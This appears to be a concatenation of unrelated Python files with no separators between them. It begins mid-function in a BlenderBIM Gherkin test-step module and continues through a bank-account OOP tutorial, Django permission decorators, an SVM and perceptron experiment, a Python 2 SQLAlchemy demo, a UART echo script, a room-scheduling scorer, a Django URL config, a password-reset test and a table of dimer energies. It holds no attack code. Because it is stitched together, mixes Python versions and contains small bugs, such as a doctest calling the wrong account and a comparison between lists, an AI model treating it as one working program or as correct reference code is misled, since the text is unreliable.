        exec(f'bpy.context.{prop} = "{value}"')
    except:
        exec(f"bpy.context.{prop} = {value}")


def prop_is_value(prop, value):
    is_value = False
    try:
        exec(f'assert bpy.context.{prop} == "{value}"')
        is_value = True
    except:
        try:
            exec(f"assert bpy.context.{prop} == {value}")
            is_value = True
        except:
            try:
                exec(f"assert list(bpy.context.{prop}) == {value}")
                is_value = True
            except:
                pass
    if not is_value:
        actual_value = eval(f"bpy.context.{prop}")
        assert False, f"Value is {actual_value}"


def i_enable_prop(prop):
    exec(f"bpy.context.{prop} = True")


def i_press_operator(operator):
    if "(" in operator:
        exec(f"bpy.ops.{operator}")
    else:
        exec(f"bpy.ops.{operator}()")


def i_rename_the_object_name1_to_name2(name1, name2):
    the_object_name_exists(name1).name = name2


def the_object_name_exists(name):
    obj = bpy.data.objects.get(name)
    if not obj:
        assert False, f'The object "{name}" does not exist'
    return obj


def an_ifc_file_exists():
    ifc = IfcStore.get_file()
    if not ifc:
        assert False, "No IFC file is available"
    return ifc


def an_ifc_file_does_not_exist():
    ifc = IfcStore.get_file()
    if ifc:
        assert False, "An IFC is available"


def the_object_name_does_not_exist(name):
    assert bpy.data.objects.get(name) is None, "Object exists"


def the_object_name_is_an_ifc_class(name, ifc_class):
    ifc = an_ifc_file_exists()
    element = ifc.by_id(the_object_name_exists(name).BIMObjectProperties.ifc_definition_id)
    assert element.is_a(ifc_class), f'Object "{name}" is an {element.is_a()}'


def the_object_name_is_not_an_ifc_element(name):
    id = the_object_name_exists(name).BIMObjectProperties.ifc_definition_id
    assert id == 0, f"The ID is {id}"


def the_object_name_is_in_the_collection_collection(name, collection):
    assert collection in [c.name for c in the_object_name_exists(name).users_collection]


def the_object_name_is_not_in_the_collection_collection(name, collection):
    assert collection not in [c.name for c in the_object_name_exists(name).users_collection]


def the_object_name_has_a_body_of_value(name, value):
    assert the_object_name_exists(name).data.body == value


def the_collection_name1_is_in_the_collection_name2(name1, name2):
    assert bpy.data.collections.get(name2).children.get(name1)


def the_collection_name1_is_not_in_the_collection_name2(name1, name2):
    assert not bpy.data.collections.get(name2).children.get(name1)


def the_object_name_is_placed_in_the_collection_collection(name, collection):
    obj = the_object_name_exists(name)
    [c.objects.unlink(obj) for c in obj.users_collection]
    bpy.data.collections.get(collection).objects.link(obj)


def the_object_name_has_a_type_representation_of_context(name, type, context):
    ifc = an_ifc_file_exists()
    element = ifc.by_id(the_object_name_exists(name).BIMObjectProperties.ifc_definition_id)
    context, subcontext, target_view = context.split("/")
    assert ifcopenshell.util.representation.get_representation(
        element, context, subcontext or None, target_view or None
    )


def the_object_name_is_contained_in_container_name(name, container_name):
    ifc = an_ifc_file_exists()
    element = ifc.by_id(the_object_name_exists(name).BIMObjectProperties.ifc_definition_id)
    container = ifcopenshell.util.element.get_container(element)
    if not container:
        assert False, f'Object "{name}" is not in any container'
    assert container.Name == container_name, f'Object "{name}" is in {container}'


def i_duplicate_the_selected_objects():
    bpy.ops.object.duplicate_move()
    blenderbim.bim.handler.active_object_callback()


def i_delete_the_selected_objects():
    bpy.ops.object.delete()
    blenderbim.bim.handler.active_object_callback()


def the_object_name1_and_name2_are_different_elements(name1, name2):
    ifc = an_ifc_file_exists()
    element1 = ifc.by_id(the_object_name_exists(name1).BIMObjectProperties.ifc_definition_id)
    element2 = ifc.by_id(the_object_name_exists(name2).BIMObjectProperties.ifc_definition_id)
    assert element1 != element2, f"Objects {name1} and {name2} have same elements {element1} and {element2}"


def the_file_name_should_contain_value(name, value):
    with open(name, "r") as f:
        assert value in f.read()


def the_object_name1_has_a_boolean_difference_by_name2(name1, name2):
    obj = the_object_name_exists(name1)
    for modifier in obj.modifiers:
        if modifier.type == "BOOLEAN" and modifier.object and modifier.object.name == name2:
            return True
    assert False, "No boolean found"


def the_object_name1_has_no_boolean_difference_by_name2(name1, name2):
    obj = the_object_name_exists(name1)
    for modifier in obj.modifiers:
        if modifier.type == "BOOLEAN" and modifier.object and modifier.object.name == name2:
            assert False, "A boolean was found"


def the_object_name_is_voided_by_void(name, void):
    ifc = IfcStore.get_file()
    element = ifc.by_id(the_object_name_exists(name).BIMObjectProperties.ifc_definition_id)
    for rel in element.HasOpenings:
        if rel.RelatedOpeningElement.Name == void:
            return True
    assert False, "No void found"


def the_object_name_is_not_voided_by_void(name, void):
    ifc = IfcStore.get_file()
    element = ifc.by_id(the_object_name_exists(name).BIMObjectProperties.ifc_definition_id)
    for rel in element.HasOpenings:
        if rel.RelatedOpeningElement.Name == void:
            assert False, "A void was found"


def the_object_name_is_not_voided(name):
    ifc = IfcStore.get_file()
    element = ifc.by_id(the_object_name_exists(name).BIMObjectProperties.ifc_definition_id)
    if any(element.HasOpenings):
        assert False, "An opening was found"


def the_object_name_is_not_a_void(name):
    ifc = IfcStore.get_file()
    element = ifc.by_id(the_object_name_exists(name).BIMObjectProperties.ifc_definition_id)
    if any(element.VoidsElements):
        assert False, "A void was found"


def the_void_name_is_filled_by_filling(name, filling):
    ifc = IfcStore.get_file()
    element = ifc.by_id(the_object_name_exists(name).BIMObjectProperties.ifc_definition_id)
    if any(rel.RelatedBuildingElement.Name == filling for rel in element.HasFillings):
        return True
    assert False, "No filling found"


def the_void_name_is_not_filled_by_filling(name, filling):
    ifc = IfcStore.get_file()
    element = ifc.by_id(the_object_name_exists(name).BIMObjectProperties.ifc_definition_id)
    if any(rel.RelatedBuildingElement.Name == filling for rel in element.HasFillings):
        assert False, "A filling was found"


def the_object_name_is_not_a_filling(name):
    ifc = IfcStore.get_file()
    element = ifc.by_id(the_object_name_exists(name).BIMObjectProperties.ifc_definition_id)
    if any(element.FillsVoids):
        assert False, "A filling was found"


def the_object_name_should_display_as_mode(name, mode):
    assert the_object_name_exists(name).display_type == mode


def the_object_name_has_number_vertices(name, number):
    total = len(the_object_name_exists(name).data.vertices)
    assert total == int(number), f"We found {total} vertices"


def the_object_name_is_at_location(name, location):
    obj_location = the_object_name_exists(name).location
    assert (
        obj_location - Vector([float(co) for co in location.split(",")])
    ).length < 0.1, f"Object is at {obj_location}"


def the_variable_key_is_value(key, value):
    variables[key] = eval(value)


definitions = {
    'the variable "(.*)" is "(.*)"': the_variable_key_is_value,
    "an empty IFC project": an_empty_ifc_project,
    "I add a cube": i_add_a_cube,
    'I add a cube of size "([0-9]+)" at "(.*)"': i_add_a_cube_of_size_size_at_location,
    'the object "(.*)" is selected': the_object_name_is_selected,
    'additionally the object "(.*)" is selected': additionally_the_object_name_is_selected,
    "I deselect all objects": i_deselect_all_objects,
    'I am on frame "([0-9]+)"': i_am_on_frame_number,
    'I set "(.*)" to "(.*)"': i_set_prop_to_value,
    '"(.*)" is "(.*)"': prop_is_value,
    'I enable "(.*)"': i_enable_prop,
    'I press "(.*)"': i_press_operator,
    'I rename the object "(.*)" to "(.*)"': i_rename_the_object_name1_to_name2,
    'the object "(.*)" exists': the_object_name_exists,
    'the object "(.*)" does not exist': the_object_name_does_not_exist,
    'the object "(.*)" is an "(.*)"': the_object_name_is_an_ifc_class,
    'the object "(.*)" is not an IFC element': the_object_name_is_not_an_ifc_element,
    'the object "(.*)" is in the collection "(.*)"': the_object_name_is_in_the_collection_collection,
    'the object "(.*)" is not in the collection "(.*)"': the_object_name_is_not_in_the_collection_collection,
    'the object "(.*)" has a body of "(.*)"': the_object_name_has_a_body_of_value,
    'the collection "(.*)" is in the collection "(.*)"': the_collection_name1_is_in_the_collection_name2,
    'the collection "(.*)" is not in the collection "(.*)"': the_collection_name1_is_not_in_the_collection_name2,
    "an IFC file exists": an_ifc_file_exists,
    "an IFC file does not exist": an_ifc_file_does_not_exist,
    'the object "(.*)" has a "(.*)" representation of "(.*)"': the_object_name_has_a_type_representation_of_context,
    'the object "(.*)" is placed in the collection "(.*)"': the_object_name_is_placed_in_the_collection_collection,
    'the object "(.*)" is contained in "(.*)"': the_object_name_is_contained_in_container_name,
    "I duplicate the selected objects": i_duplicate_the_selected_objects,
    "I delete the selected objects": i_delete_the_selected_objects,
    'the object "(.*)" and "(.*)" are different elements': the_object_name1_and_name2_are_different_elements,
    'the file "(.*)" should contain "(.*)"': the_file_name_should_contain_value,
    'the object "(.*)" has a boolean difference by "(.*)"': the_object_name1_has_a_boolean_difference_by_name2,
    'the object "(.*)" has no boolean difference by "(.*)"': the_object_name1_has_no_boolean_difference_by_name2,
    'the object "(.*)" is voided by "(.*)"': the_object_name_is_voided_by_void,
    'the object "(.*)" is not voided by "(.*)"': the_object_name_is_not_voided_by_void,
    'the object "(.*)" is not a void': the_object_name_is_not_a_void,
    'the object "(.*)" is not voided': the_object_name_is_not_voided,
    'the object "(.*)" should display as "(.*)"': the_object_name_should_display_as_mode,
    'the object "(.*)" has "([0-9]+)" vertices': the_object_name_has_number_vertices,
    'the object "(.*)" is at "(.*)"': the_object_name_is_at_location,
    "nothing interesting happens": lambda: None,
    'the void "(.*)" is filled by "(.*)"': the_void_name_is_filled_by_filling,
    'the void "(.*)" is not filled by "(.*)"': the_void_name_is_not_filled_by_filling,
    'the object "(.*)" is not a filling': the_object_name_is_not_a_filling,
}


# Super lightweight Gherkin implementation
def run(scenario):
    keywords = ["Given", "When", "Then", "And", "But"]
    for line in scenario.split("\n"):
        for key, value in variables.items():
            line = line.replace("{" + key + "}", str(value))
        for keyword in keywords:
            line = line.replace(keyword, "")
        line = line.strip()
        if not line:
            continue
        match = None
        for definition, callback in definitions.items():
            match = re.search("^" + definition + "$", line)
            if match:
                try:
                    callback(*match.groups())
                except AssertionError as e:
                    assert False, f"Failed: {line}, with error: {e}"
                break
        if not match:
            assert False, f"Definition not implemented: {line}"
    return True


def run_debug(scenario, blend_filepath=None):
    try:
        result = run(scenario)
    except Exception as e:
        if blend_filepath:
            bpy.ops.wm.save_as_mainfile(filepath=blend_filepath)
        assert False, e
    if blend_filepath:
        bpy.ops.wm.save_as_mainfile(filepath=blend_filepath)
    return result

import os
import sys
import string
import random
import math


#################################################
# State

balance = 0


def deposit(amount):
    global balance
    balance += amount
    return balance


def withdraw(amount):
    global balance
    balance -= amount
    return balance

#################################################
# Dict like


def make_account():
    return {'balance': 0}


def deposit(account, amount):
    account['balance'] += amount
    return account['balance']


def withdraw(account, amount):
    account['balance'] -= amount
    return account['balance']


# >>> a = make_account()
# >>> b = make_account()
# >>> deposit(a, 100)
# 100
# >>> deposit(b, 50)
# 50
# >>> withdraw(b, 10)
# 40
# >>> withdraw(a, 10)
# 90

#################################################
# Class


class BankAccount:
    def __init__(self, balance=0):
        self.balance = balance

    def withdraw(self, amount):
        self.balance -= amount
        return self.balance

    def deposit(self, amount):
        self.balance += amount
        return self.balance


# >>> a = BankAccount()
# >>> b = BankAccount()
# >>> a.deposit(100)
# 100
# >>> b.deposit(50)
# 50
# >>> b.withdraw(10)
# 40
# >>> a.withdraw(10)
# 90

#################################################
# Inheritance


class MinimumBalanceAccount(BankAccount):
    def __init__(self, minimum_balance):
        BankAccount.__init__(self)
        self.minimum_balance = minimum_balance

    def withdraw(self, amount):
        if self.balance - amount < self.minimum_balance:
            print('Sorry, minimum balance must be maintained.')
        else:
            BankAccount.withdraw(self, amount)

# >>> a = MinimumBalanceAccount(0)
# >>> a.deposit(100)
# 100
# >>> b.withdraw(101)
# 'Sorry, minimum balance must be maintained.'


########################################
# Mangling, Exceptions


def generate_id(n=16):
    alphabet = string.ascii_letters + string.digits
    return ''.join(random.choice(alphabet) for _ in range(n))


class WithdrawError(Exception):
    """Not enough money"""
    def __init__(self, amount):
        super().__init__()
        self.amount = amount


class AdvancedBankAccount:
    MAX_BALANCE = 2 ** 64

    def __init__(self):
        self._balance = 0
        self.__id = generate_id()

    def withdraw(self, amount):
        if not isinstance(amount, int):
            raise ValueError
        if self._balance < amount:
            raise WithdrawError(amount)
        self._balance -= amount
        return self._balance

    def deposit(self, amount):
        self._balance += amount
        return self._balance

    def get_max_balance():
        return AdvancedBankAccount.MAX_BALANCE

if __name__ == '__main__':
    a = AdvancedBankAccount()
    b = a
    c = AdvancedBankAccount()
    a.deposit(10)
    # AdvancedBankAccount.deposit(a, 10) # the same
    print('UNACCEPTABLE! b balance:', b._balance)
    # print(b.__id) # error, name mangling
    a.get_id = lambda self: self.__id
    # print(a.get_id())  # TypeError
    # print(a.get_id(a)) # AttributeError

    ################################################
    # UNACCEPTABLE!
    print("UNACCEPTABLE! b id:", b._AdvancedBankAccount__id)  # name unmangling

    # static
    AdvancedBankAccount.MAX_BALANCE = 2 ** 32
    print('max balance:', AdvancedBankAccount.get_max_balance())
    a.MAX_BALANCE = 2 ** 64
    print('a max: {}, c max: {}'.format(a.MAX_BALANCE,
                                        c.MAX_BALANCE))

    ################################################
    # Exceptions

    # in module import
    try:
        a.withdraw("100")
    except:
        pass
        # UNACCEPTIBLE!
    try:
        a.withdraw(100)
    except WithdrawError as e:
        pass

    try:
        a.withdraw(100)
    except (ValueError, WithdrawError) as e:
        print('exception raised')
    else:
        print('no exception')
    finally:
        print('Finally')

    def tricky():
        try:
            print('Tricky called')
            return 1
        finally:
            print('Tricky finally called')
            return 42
        return 0

    print(tricky())
    # how about with statement?
    # module is object -> import

class Shape:
    def area(self):
        raise NotImplementedError

class Circle(Shape):
    def __init__(self, radius):
        self.radius = radius

    def area(self):
        return math.pi * self.radius ** 2

class Square(Shape):
    def __init__(self, side):
        self.side = side

    def area(self):
        return self.side ** 2


if __name__ == "__main__":
    a = [Square(10), Circle(2)]
    s = sum(s.area() for s in a)
    print(s)



class PermissionRequired(Exception):
    """
    Exception to be thrown by views which check permissions internally.
    Takes a single C{perm} argument which defines the permission that caused
    the exception.
    """
    def __init__(self, perm):
        self.perm = perm


def require_permissions(user, *permissions):
    for perm in permissions:
        if not user.has_perm(perm):
            raise PermissionRequired(perm)


class checks_permissions(object):
    """
    Decorator for views which handle C{PermissionRequired} errors and renders
    the given error view if necessary.
    The original request and arguments are passed to the error with the 
    additional C{_perm} and C{_view} keyword arguments.
    """
    def __init__(self, view_or_error=None):
        self.wrapped = callable(view_or_error)
        error_view = None
        
        if self.wrapped:
            self.view = view_or_error
        else:
            error_view = view_or_error
        
        if not error_view:
            from django.conf import settings
            error_view = settings.PERMISSIONS_VIEW
        
        from django.core.urlresolvers import get_callable
        self.error_view = get_callable(error_view)
    
    def __call__(self, view_or_request, *args, **kwargs):
        if not self.wrapped:
            self.view = view_or_request
        
        def dec(*args, **kwargs):
            try:
                return self.view(*args, **kwargs)
            except PermissionRequired as e:
                kwargs['_perm'] = e.perm
                kwargs['_view'] = self.view
                return self.error_view(*args, **kwargs)
        
        return dec(view_or_request, *args, **kwargs) if self.wrapped else dec


class permission_required(object):
    """
    Decorator which builds upon the C{checks_permission} decorator to offer
    the same functionality as the built-in
    C{django.contrib.auth.decorators.permission_required} decorator but which
    renders an error view insted of redirecting to the login page.
    """
    def __init__(self, perm, error_view=None):
        self.perm = perm
        self.error_view = error_view
    
    def __call__(self, view_func):
        def decorator(request, *args, **kwargs):
            if not request.user.has_perm(self.perm):
                raise PermissionRequired(self.perm)
            return view_func(request, *args, **kwargs)
        return checks_permissions(self.error_view)(decorator)



# -*- coding: utf-8 -*-
"""
Created on Fri Nov 15 15:55:28 2013

@author: dyanna
"""

import numpy as np
from sklearn.svm import SVC

def getSample(pointA, pointB, numberOfPoints):
    pointList = list(zip(np.random.uniform(-1,1.00,numberOfPoints),np.random.uniform(-1,1.00,numberOfPoints)))
    sample = np.array([(i[0], i[1], isLeft(pointA, pointB, i)) for i in pointList])
    y = sample[:,2]
    breakpoint = False
    while not breakpoint:
        if(len(y[y==-1]) == 0 or len(y[y==1]) == 0):
            pointList = list(zip(np.random.uniform(-1,1.00,numberOfPoints),np.random.uniform(-1,1.00,numberOfPoints)))
            sample = np.array([(i[0], i[1], isLeft(pointA, pointB, i)) for i in pointList])
            y = sample[:,2]
        else: 
            breakpoint = True
    return sample

def getRandomLine():
    return list(zip(np.random.uniform(-1,1.00,2),np.random.uniform(-1,1.00,2)))

def getPoints(numberOfPoints):
    pointList = list(zip(np.random.uniform(-1,1.00,numberOfPoints),np.random.uniform(-1,1.00,numberOfPoints)))
    return pointList

def isLeft(a, b, c):
    return 1 if ((b[0] - a[0])*(c[1] - a[1]) - (b[1] - a[1])*(c[0] - a[0])) > 0 else -1;

def sign(x):
    return 1 if x > 0 else -1 


def getMisMatchesQP(data, clf):
    #print(data)
    data_x = np.c_[data[:,0], data[:,1]]
    results = clf.predict(data_x)
    #print(np.sign(results))
    print("mismatch ", float(len(data) - np.sum(np.sign(results) == np.sign(data[:,2])))/len(data))
    print("score ", clf.score(data_x, data[:,2]))
    
    return float(len(data) - np.sum(np.sign(results) == np.sign(data[:,2])))/len(data)
    


def doMonteCarloQP(pointa, pointb, clf, nopoint):
    #print "weights ", weight
    points = [(np.random.uniform(-1,1), np.random.uniform(-1,1)) for i in range(nopoint)]
    #print points
    dataset_Monte = np.array([(i[0],i[1], isLeft(pointa,pointb,i)) for i in points])
    #print dataset_Monte
    return getMisMatchesQP(dataset_Monte, clf)

def doPLA(sample):
    w = np.array([0,0,0])
    iteration = 0
    it = 0
    while True:#(it < 10):
        iteration = iteration + 1
        it = it + 1
        mismatch = list()
        for i in sample:
            #print("point in question ", i , " weight ", w)
            yy = w[0] + w[1] * i[0] + w[2] * i[1]
            #print("this is after applying weight to a point ",yy)
            point = [i[0], i[1], sign(yy)]
            if any(np.equal(sample, point).all(1)):
                #print "point not in sample"
                if(point[2] == -1):
                    mismatch.append((1, (i[0]), (i[1])))
                else:
                    mismatch.append((-1, -(i[0]), -(i[1])))
        #print " length ", len(mismatch), " mismatch list ",mismatch 
        if(len(mismatch) > 0):
            #find a random point and update w
            choiceIndex = np.random.randint(0, len(mismatch))
            choice = mismatch[choiceIndex]
            #print("choice ", choice)
            w = w + choice
            #print "new weight ", w
        else:
            break
    #print("this is the iteration ", iteration)
    #print("this is the weight ", w)
    #montelist = [monetcarlo((x1,y1),(x2,y2),w,10000) for i in range(5)]
    #print("Montelist " , montelist)
    #monteavg = sum([i for i in montelist])/10
    return w, iteration

def getMisMatches(data, weights):
    #print data
    list1 = np.empty(len(data))
    list1.fill(weights[0])
    results = list1+ weights[1]*data[:,0]+weights[2]*data[:,1]
    results = -1 * results
    return float(len(data) - np.sum(np.sign(results) == np.sign(data[:,2])))/len(data)
    


def doMonteCarloNP(pointa, pointb, weights, nopoint):
    #print "weights ", weight
    points = [(np.random.uniform(-1,1), np.random.uniform(-1,1)) for i in range(nopoint)]
    #print points
    dataset_Monte = np.array([(i[0],i[1], isLeft(pointa,pointb,i)) for i in points])
    #print dataset_Monte
    return getMisMatches(dataset_Monte, weights)


if __name__ == "__main__":
    '''X = np.array([[-1,-1],[-2,-1], [1,1], [2,1]])
    y = np.array([1,1,2,2])
    clf = SVC()
    clf.fit(X,y)
    print(clf.predict([[-0.8,-1]]))'''
    #clf = SVC()
    clf = SVC(C = 1000, kernel = 'linear')  
    monteavgavgQP = list()
    monteavgavgPLA = list()
    approxavgQP = list()
    vectornumberavg = list()
    predictavg = list()
    for j in range(1):
        #clf = SVC(C = 1000, kernel = 'linear') 
        monteavgQP = list()
        monteavgPLA = list()
        approxQP = list()
        vectoravg = list()
        for k in range(1000):
            nopoints = 100
            line = getRandomLine()
            sample = getSample(line[0], line[1], nopoints)
            #print(sample)
            X = np.c_[sample[:,0], sample[:,1]]
            y = sample[:,2]
            #print(y)
            clf.fit(X,y)
            #print(clf.score(X,y))
            w, it = doPLA(sample)
            #print(len(clf.support_vectors_))
            #print(clf.support_vectors_)
            #print(clf.support_)
            vectoravg.append(len(clf.support_vectors_))
            #print(clf.predict(clf.support_vectors_)==1)
            #print(clf.predict(clf.support_vectors_))
            #print(clf.coef_)
            montelistQP = [doMonteCarloQP(line[0], line[1], clf, 500) for i in range(1)]
            qpMonte = sum(montelistQP)/len(montelistQP)
            monteavgQP.append(sum(montelistQP)/len(montelistQP))
            
            montelist = [ doMonteCarloNP(line[0], line[1], w, 500) for i in range(1)]
            plaMonte = sum(montelist)/len(montelist)
            monteavgPLA.append(plaMonte)
            if(montelistQP < monteavgPLA):
                approxQP.append(1)
            else:
                approxQP.append(0)
            
        #print(sum(monteavgQP)/len(monteavgQP))
        #print(sum(monteavgPLA)/len(monteavgPLA))
        #print(sum(approxQP)/len(approxQP))
        monteavgavgQP.append(sum(monteavgQP)/len(monteavgQP))
        monteavgavgPLA.append(sum(monteavgPLA)/len(monteavgPLA))
        approxavgQP.append(sum(approxQP)/len(approxQP))
        vectornumberavg.append(sum(vectoravg)/len(vectoravg))
    print(sum(monteavgavgQP)/len(monteavgavgQP))
    print(sum(monteavgavgPLA)/len(monteavgavgPLA))
    print("how good is it? ", sum(approxavgQP)/len(approxavgQP))
    print("how good is it? ", sum(vectornumberavg)/len(vectornumberavg))
    
    
from sqlalchemy import create_engine, Column, Integer, String, ForeignKey, Table
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker, relationship

# demo many to many relationship
# http://docs.sqlalchemy.org/en/rel_0_9/orm/basic_relationships.html#many-to-many

engine = create_engine('sqlite:///manymany.db')
Base = declarative_base()

# Association table linking the two tables
# Also see: http://docs.sqlalchemy.org/en/rel_0_9/orm/basic_relationships.html#association-object
member_club_mapping = Table('member_club_mapping', Base.metadata,
                            Column('member_id', Integer, ForeignKey('member.id')),
                            Column('club_id', Integer, ForeignKey('club.id')))

class Member(Base):
    
    __tablename__ = 'member'

    id = Column(Integer, primary_key=True)
    first_name = Column(String)
    last_name = Column(String)
    clubs = relationship('Club', back_populates='members',
                         secondary=member_club_mapping)
    def __init__(self, first_name, last_name):
        self.first_name = first_name
        self.last_name = last_name

class Club(Base):
    __tablename__ = 'club'

    id = Column(Integer, primary_key=True)
    name = Column(String)
    members = relationship('Member', back_populates='clubs',
                           secondary=member_club_mapping)
    def __init__(self, name):
        self.name = name

# create tables
Base.metadata.create_all(engine)
# create a Session
Session = sessionmaker(bind=engine)
session = Session()

# Populate
member1 = Member('John', 'Doe')
club1 = Club('Club dub')
club1.members.append(member1)
session.add(club1)

club2 = Club('Club dub dub')
club2.members.append(member1)
session.add(club2)

club3 = Club('Club dub step')
session.add(club3)

member2 = Member('Jane', 'Allen')
member2.clubs.extend([club1, club2])
session.add(member2)

session.commit()

# query and print Member
res = session.query(Member).all()
for member in res:
    print member.first_name, member.last_name , [club.name for club in member.clubs]

# query and print Club
res = session.query(Club).all()
for club in res:
    print club.name, [(member.first_name, member.last_name) for member in club.members]

print 'After removing members with first name: Jane'
# Remove a record 
record = session.query(Member).filter(Member.first_name == 'Jane').all()
for r in record:
    session.delete(r)

session.commit()

# query and print Member
res = session.query(Member).all()
for member in res:
    print member.first_name, member.last_name , [club.name for club in member.clubs]

# query and print
res = session.query(Club).all()
for club in res:
    print club.name, [(member.first_name, member.last_name) for member in club.members]

print 'After removing the club, Club dub'
# Remove a record 
record = session.query(Club).filter(Club.name == 'Club dub').all()
for r in record:
    session.delete(r)

session.commit()

# query and print Member
res = session.query(Member).all()
for member in res:
    print member.first_name, member.last_name , [club.name for club in member.clubs]

# query and print
res = session.query(Club).all()
for club in res:
    print club.name, [(member.first_name, member.last_name) for member in club.members]

import os

# Application constants
APP_NAME = 'job_offers'
INSTALL_DIR = os.path.dirname(os.path.abspath(__file__))
LOG_FORMAT = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'
LOG_NAME = os.path.join(INSTALL_DIR, 'job_offers.log')

# Testing fixtures
JOB_OFFER_FIXTURES = os.path.join(INSTALL_DIR, "fixtures/job_offers.json")

#!/usr/bin/python
# uart-eg01.py
#
# to run on the other end of the UART
# screen /dev/ttyUSB1 115200

import serial

def readlineCR(uart):
	line = b''
	while True:
		byte = uart.read()
		line += byte
		if byte == b'\r':
			return line

uart = serial.Serial('/dev/ttyUSB0', baudrate=115200, timeout=1)

while True:
	uart.write(b'\r\nSay something: ')
	line = readlineCR(uart)
	if line != b'exit\r':
		lineStr = '\r\nYou sent     : {}'.format(line.decode('utf-8'))
		uart.write(lineStr.encode('utf-8'))
	else:
		uart.write(b'\r\nexiting\r\n')
		uart.close()
		exit(0)

from rec import CourseRecord
from score import RoomScore
from evaluation import ScheduleEvaluation

FULL_HOURS    = 8 # 8:00AM - 4:00PM utilization
PARTIAL_HOURS = FULL_HOURS * 0.75 #75%
HALF_HOURS    = FULL_HOURS * 0.50 #50%
SPARSE_HOURS  = FULL_HOURS * 0.25 #25%

class LocationScore:


    def __init__(self, evals=None):

        self.evals   = evals
        self.courses = None
        self.location  = None

        self.daily_weights  = {"M": {}, "T": {}, "W": {}, "R": {}, "F": {} ,"S": {}}
        self.daily_totals   = {"M": {}, "T": {}, "W": {}, "R": {}, "F": {} ,"S": {}}
        self.final_weighted = 0
        self.weight_rank    = 0 # 0 = worst, 1 = best
        if evals != None:
            self.courses = self.evals.get_records()
            self.location    = self.find_location()
            self.final_weighted = self.calculate_final_weighted_score()

    def reset_daily_weights(self):
        for day in ["M", "T", "W", "R", "F", "S"]:
            self.daily_weights[day] = 0
            self.daily_totals[day]  = 0

    def get_daily_weight(self,day_of_week):
        return self.daily_weights[day_of_week]

    def normalize_final_weighted_score(self,minimum,maximum):
        value = self.final_weighted
        value -= minimum
        if maximum - minimum > 0:
            value /= ( maximum - minimum )
        else:
            value = 0
        self.weight_rank = "{0:.2f}".format(value * 10)

    def calculate_final_weighted_score(self):
        score_sum   = 0.00
        score_total = 0.00

        #reset daily stuff
        self.reset_daily_weights()

        for course, score in self.courses:
            days = course.rec["DAYS_OF_WEEK"]
            #score_sum   += score.get_weighted_score(course)
            score_total += 1.00
            for day in ["M", "T", "W", "R", "F", "S"]:
                if day in days:
                    self.daily_weights[day] += score.get_weighted_score(course)
                    self.daily_totals[day]  += 1

        for day in ["M", "T", "W", "R", "F", "S"]:
            if self.daily_totals[day] > 0:
                self.daily_weights[day] /= self.daily_totals[day]
                self.daily_weights[day] = self.adjust_utilization(self.daily_weights[day],self.daily_totals[day])
                score_sum += self.daily_weights[day]
            else:
                self.daily_weights[day] = 0
        return score_sum / score_total

    def adjust_utilization(self,weights,totals):
        max_score = 1.00
        if totals >= FULL_HOURS: # 8 Hours or more, give slight boost to score
            weights *= 1.15 # 15% Boost
        elif totals >= PARTIAL_HOURS:   # Small Penalty
            weights *= (PARTIAL_HOURS/FULL_HOURS) 
        elif totals >= HALF_HOURS:      # Medium Penalty
            weights *= (HALF_HOURS/FULL_HOURS) 
        elif totals >  SPARSE_HOURS:    # Large Penalty
            weights *= (SPARSE_HOURS/FULL_HOURS) 
        else:                           # Very Large Penalty
            weights *= (1.00/FULL_HOURS)
        return weights

    def get_location(self):
        return self.location

    def find_location(self):
        for course, score in self.courses:
            location = str( course.rec["BUILDING"] )+ " " + str( course.rec["ROOM"] )
            # just need to find the first one, so break after this happens
            break   
        return location

    def get_final_weighted_score(self):
        return self.final_weighted

    def get_score_rank(self):
        return self.weight_rank

    def get_evals(self):
        return self.evals

"""redblue_project URL Configuration

The `urlpatterns` list routes URLs to views. For more information please see:
    https://docs.djangoproject.com/en/1.9/topics/http/urls/
Examples:
Function views
    1. Add an import:  from my_app import views
    2. Add a URL to urlpatterns:  url(r'^$', views.home, name='home')
Class-based views
    1. Add an import:  from other_app.views import Home
    2. Add a URL to urlpatterns:  url(r'^$', Home.as_view(), name='home')
Including another URLconf
    1. Add an import:  from blog import urls as blog_urls
    2. Import the include() function: from django.conf.urls import url, include
    3. Add a URL to urlpatterns:  url(r'^blog/', include(blog_urls))
"""
from django.conf.urls import url, include
from django.contrib import admin

urlpatterns = [
    url(r'^red/', include('apps.red_app.urls', namespace='red_namespace')),
    url(r'^blue/', include('apps.blue_app.urls', namespace='blue_namespace')),
    url(r'^admin/', admin.site.urls),
]

from djangosanetesting.cases import HttpTestCase
from django.conf import settings
from django.core.urlresolvers import reverse
from django.core import mail
from accounts.tests import testdata

class TestResetPassword(HttpTestCase):
    def __init__(self, *args, **kwargs):
        super(self.__class__, self).__init__(*args, **kwargs)
        self.host = 'localhost'
        self.port = 8000

    def setUp(self):
        testdata.run()

    def test_reset_password(self):

        res = self.client.post(reverse('password_reset'),
                               {'register_number' : settings.TEST_USERNAME,
                               },
                               follow=True)

        assert reverse('password_reset_done') in res.request['PATH_INFO']
        assert len(mail.outbox) == 1

        reset_url = [word for word in mail.outbox[0].body.split() if word.startswith('http')][0]
        res = self.client.get(reset_url, follow=True)

        assert res.status_code == 200
        assert 'unsuccessful' not in res.content.lower()
        assert 'change my password' in res.content.lower()

        # I've to stop here, because next step is to change password at Google Apps.
        # Can't mess up production database.

energies = dict()

energies[81]  =  -3.17    # Ammoniadimer.xyz
energies[82]  =  -5.02    # Waterdimer.xyz
energies[83]  =  -1.50    # BenzeneMethanecomplex.xyz
energies[84]  = -18.61    # Formicaciddimer.xyz
energies[85]  = -15.96    # Formamidedimer.xyz
energies[86]  = -20.65    # Uracildimerhbonded.xyz
energies[87]  = -16.71    # 2pyridoxine2aminopyridinecomplex.xyz
energies[88]  = -16.37    # AdeninethymineWatsonCrickcomplex.xyz
energies[89]  =  -0.53    # Methanedimer.xyz
energies[90]  =  -1.51    # Ethenedimer.xyz
energies[91]  =  -2.73    # Benzenedimerparalleldisplaced.xyz
energies[92]  =  -4.42    # Pyrazinedimer.xyz
energies[93]  = -10.12    # Uracildimerstack.xyz
energies[94]  =  -5.22    # Indolebenzenecomplexstack.xyz
energies[95]  = -12.23    # Adeninethyminecomplexstack.xyz
energies[96]  =  -1.53    # Etheneethynecomplex.xyz
energies[97]  =  -3.28    # Benzenewatercomplex.xyz
energies[98]  =  -2.35    # Benzeneammoniacomplex.xyz
energies[99]  =  -4.46    # BenzeneHCNcomplex.xyz
energies[100] =  -2.74    # BenzenedimerTshaped.xyz
